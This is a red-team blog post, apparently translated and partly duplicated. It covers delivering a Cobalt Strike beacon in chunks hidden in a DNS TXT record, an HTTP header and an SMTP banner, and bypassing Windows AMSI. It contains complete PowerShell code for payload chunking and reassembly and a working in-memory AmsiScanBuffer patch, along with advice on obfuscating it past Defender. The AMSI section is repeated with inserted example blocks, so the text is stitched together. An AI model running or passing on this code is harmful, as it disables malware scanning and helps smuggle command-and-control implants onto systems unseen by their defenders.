Infiltrating CS Beacon through different mediums
Introduction: Hello everyone. We have all heard of the many infiltration techniques that are widely used, and that wide use is exactly what makes them easy to detect. So we at Confidential took a step toward an infiltration technique that is a bit more complex, so that it is harder to detect with any single sensor. Today's article explains how we infiltrated a Cobalt Strike (CS) beacon through several different mediums.
Brief: We split the CS beacon into multiple chunks that are later infiltrated through different mediums (a DNS TXT record, a custom HTTP response header, and an SMTP server's banner) using an executable agent, which we demonstrate fully at the end of the article.
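As an added example (not Confidential's agent, whose chunk format is not published on this page), here is a PowerShell sketch of both halves of the idea: the splitter that turns a payload into carrier-sized chunks, and the agent-side extractors and reassembly with an integrity check. The `index/total:base64` chunk format, the header name `X-Cache-Token`, and the three carrier responses below are constructed for the demo; the payload is a stand-in string, not a beacon.

```powershell
# Added example: split a payload into chunks, embed each in one of three carriers
# (DNS TXT record, custom HTTP response header, SMTP greeting banner), then
# recover and reassemble them the way a retrieval agent would. Runs offline.

function Get-Sha256Hex {
    param([byte[]]$Bytes)
    $sha = [System.Security.Cryptography.SHA256]::Create()
    ($sha.ComputeHash($Bytes) | ForEach-Object { $_.ToString('x2') }) -join ''
}

function Split-Payload {
    param([byte[]]$Bytes, [int]$Count)
    # Chunk size from the requested count, then recount so a short payload never
    # advertises chunks that do not exist (the agent would otherwise wait forever).
    $size = [int][math]::Ceiling($Bytes.Length / $Count)
    $n    = [int][math]::Ceiling($Bytes.Length / $size)
    for ($i = 0; $i -lt $n; $i++) {
        $start = $i * $size
        $len   = [math]::Min($size, $Bytes.Length - $start)
        $slice = New-Object byte[] $len
        [Array]::Copy($Bytes, $start, $slice, 0, $len)
        '{0}/{1}:{2}' -f $i, $n, [Convert]::ToBase64String($slice)   # assumed chunk format
    }
}

# Carrier 1: a TXT record is a list of strings of at most 255 bytes; the chunk
# may span several of them, so the extractor simply concatenates in order.
function Get-ChunkFromTxt { param([string[]]$Strings) return ($Strings -join '') }

# Carrier 2: raw HTTP response; read only the header block, names are case-insensitive.
function Get-ChunkFromHttpHeader {
    param([string]$RawResponse, [string]$HeaderName)
    $headerBlock = ($RawResponse -split "`r`n`r`n", 2)[0]
    $pattern = '^{0}:\s*(.+?)\s*$' -f [regex]::Escape($HeaderName)
    foreach ($line in ($headerBlock -split "`r`n")) {
        if ($line -match $pattern) { return $Matches[1] }
    }
    throw "Header $HeaderName not present in response"
}

# Carrier 3: the RFC 5321 "220" greeting line; the chunk rides as one token of the banner.
function Get-ChunkFromSmtpBanner {
    param([string]$Banner)
    if ($Banner -match '^220[ -].*?(\d+/\d+:[A-Za-z0-9+/=]+)') { return $Matches[1] }
    throw 'No chunk token in SMTP banner'
}

function Join-Payload {
    param([string[]]$Chunks, [string]$ExpectedSha256)
    $parts = @{}; $total = $null
    foreach ($c in $Chunks) {
        $m = [regex]::Match($c, '^(\d+)/(\d+):([A-Za-z0-9+/=]+)$')
        if (-not $m.Success) { throw "Malformed chunk: $c" }
        $n = [int]$m.Groups[2].Value
        if ($null -eq $total) { $total = $n } elseif ($n -ne $total) { throw 'Chunk count mismatch' }
        $parts[[int]$m.Groups[1].Value] = [Convert]::FromBase64String($m.Groups[3].Value)
    }
    $out = New-Object System.Collections.Generic.List[byte]
    for ($i = 0; $i -lt $total; $i++) {
        if (-not $parts.ContainsKey($i)) { throw "Missing chunk $i of $total" }
        $out.AddRange([byte[]]$parts[$i])
    }
    $bytes = $out.ToArray()
    # A chunk mangled in transit (a proxy rewriting headers, a truncated TXT string)
    # must never be executed, so compare against a hash delivered separately.
    if ((Get-Sha256Hex $bytes) -ne $ExpectedSha256) { throw 'Integrity check failed' }
    return ,$bytes
}

# --- Constructed demo: the three carriers are built locally, nothing is fetched.
$payload  = [Text.Encoding]::ASCII.GetBytes('stand-in for the beacon stage; a real agent would pull shellcode or a PE')
$expected = Get-Sha256Hex $payload
$chunks   = @(Split-Payload -Bytes $payload -Count 3)

$txtStrings = @()
for ($p = 0; $p -lt $chunks[0].Length; $p += 255) {
    $txtStrings += $chunks[0].Substring($p, [math]::Min(255, $chunks[0].Length - $p))
}
$httpResponse = "HTTP/1.1 200 OK`r`nServer: nginx`r`nX-Cache-Token: $($chunks[1])`r`nContent-Length: 0`r`n`r`n"
$smtpBanner   = "220 mail.example.com ESMTP $($chunks[2]) ready`r`n"

$recovered = @(
    Get-ChunkFromTxt -Strings $txtStrings
    Get-ChunkFromHttpHeader -RawResponse $httpResponse -HeaderName 'X-Cache-Token'
    Get-ChunkFromSmtpBanner -Banner $smtpBanner
)
$bytes = Join-Payload -Chunks $recovered -ExpectedSha256 $expected
'Reassembled {0} bytes from 3 carriers; SHA-256 {1} verified' -f $bytes.Length, $expected
```

In a live agent the same three extractors would be fed by `(Resolve-DnsName -Name <host> -Type TXT).Strings`, the `Headers` collection of an `Invoke-WebRequest` response, and the first line read from a `System.Net.Sockets.TcpClient` connected to port 25. Two caveats a practitioner should keep in mind: each medium has its own size limit (255 bytes per TXT string, a few kilobytes per HTTP header at most proxies, one line for the banner), so chunk sizes have to be chosen per carrier rather than uniformly; and DNS and SMTP travel in cleartext, so splitting the payload spreads it across sensors but does not hide it from an analyst who correlates all three streams.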
Memory Patching (AMSI Bypass)
Introduction: Hello everyone. I think we have all run into the Antimalware Scan Interface, better known as AMSI, and I believe you have had problems when loading a PowerShell module such as Mimikatz. In short, AMSI is loaded into any application that integrates with the AMSI API (PowerShell, Windows Script Host, Office macros and the .NET assembly loader among them), not simply every application that uses the Win32 API. You can also check the AMSI architecture in the image below.
Overview: From the image we can see that the functions that scan content for malicious code are AmsiScanBuffer() and AmsiScanString(). AmsiScanString() is a thin wrapper that hands its string to AmsiScanBuffer(), which is why memory patches target AmsiScanBuffer() alone.
Memory Patching (AMSI Bypass)
Introduction: Peace be upon you. Most of us have run into the Antimalware Scan Interface, better known as `AMSI`, and you have probably hit problems whenever you tried to load a PowerShell module such as `Mimikatz` and the like. `AMSI` is loaded into any application that integrates with the AMSI API (PowerShell, Windows Script Host, Office macros and the .NET assembly loader among them), not simply every application that uses the `WIN32 API`. You can look at the `AMSI architecture` in the image below.
Overview: From the image we can see that the functions responsible for scanning content for malicious code are `AmsiScanBuffer()` and `AmsiScanString()`. We can use `Process Hacker` to see which modules are loaded into any given program, which is how to confirm that amsi.dll is present in the PowerShell process.
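The memory patch that both the English and the Arabic editions of this post describe, as an added example that is not the article's own code: in the current 64-bit PowerShell process, locate the `AmsiScanBuffer` export of amsi.dll, make its first six bytes writable, and overwrite them so the function returns `E_INVALIDARG` (0x80070057). PowerShell only blocks content when the scan call succeeds and reports `AMSI_RESULT_DETECTED`, so a failing call lets the content through. The function names and the `Win32` P/Invoke class are this example's own; the 32-bit patch bytes differ and are not covered.

```powershell
# Added example: patch AmsiScanBuffer() in this PowerShell process (x64 only).

$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize,
                                             uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type -TypeDefinition $Win32

# mov eax, 0x80070057 (E_INVALIDARG) ; ret
$AmsiPatch = [byte[]](0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)

function Get-AmsiScanBufferAddress {
    # amsi.dll is already mapped into PowerShell, so LoadLibrary just returns its handle.
    $hAmsi = [Win32]::LoadLibrary('amsi.dll')
    if ($hAmsi -eq [IntPtr]::Zero) { throw 'amsi.dll could not be loaded' }
    $addr = [Win32]::GetProcAddress($hAmsi, 'AmsiScanBuffer')
    if ($addr -eq [IntPtr]::Zero) { throw 'AmsiScanBuffer export not found' }
    return $addr
}

function Test-AmsiScanBufferPatched {
    # Read the prologue back and compare it with the patch bytes.
    param([IntPtr]$Target)
    $current = New-Object byte[] $AmsiPatch.Length
    [System.Runtime.InteropServices.Marshal]::Copy($Target, $current, 0, $current.Length)
    return (($current -join ',') -eq ($AmsiPatch -join ','))
}

function Invoke-AmsiScanBufferPatch {
    if (-not [Environment]::Is64BitProcess) { throw 'These patch bytes are for x64 only' }
    $target = Get-AmsiScanBufferAddress
    if (Test-AmsiScanBufferPatched -Target $target) { return $target }   # already done, keep it idempotent

    # .text is mapped PAGE_EXECUTE_READ; make the six bytes writable, patch, restore.
    $oldProtect = 0
    $size = [UIntPtr]::new([uint32]$AmsiPatch.Length)
    if (-not [Win32]::VirtualProtect($target, $size, 0x40, [ref]$oldProtect)) {   # 0x40 = PAGE_EXECUTE_READWRITE
        throw 'VirtualProtect failed'
    }
    [System.Runtime.InteropServices.Marshal]::Copy($AmsiPatch, 0, $target, $AmsiPatch.Length)
    [Win32]::VirtualProtect($target, $size, $oldProtect, [ref]$oldProtect) | Out-Null
    return $target
}

$addr = Invoke-AmsiScanBufferPatch
'AmsiScanBuffer at 0x{0:X}; patched: {1}' -f $addr.ToInt64(), (Test-AmsiScanBufferPatched -Target $addr)
```

Two practical caveats. The script itself is scanned by AMSI before it runs, and Defender signatures match the literal string `AmsiScanBuffer` and this byte sequence, so the unmodified example is usually blocked in a default Windows 10/11 session; that is why published variants obfuscate the strings. The patch also lives only in the current process: a new PowerShell window, or anything that spawns a fresh `powershell.exe`, starts with an intact amsi.dll.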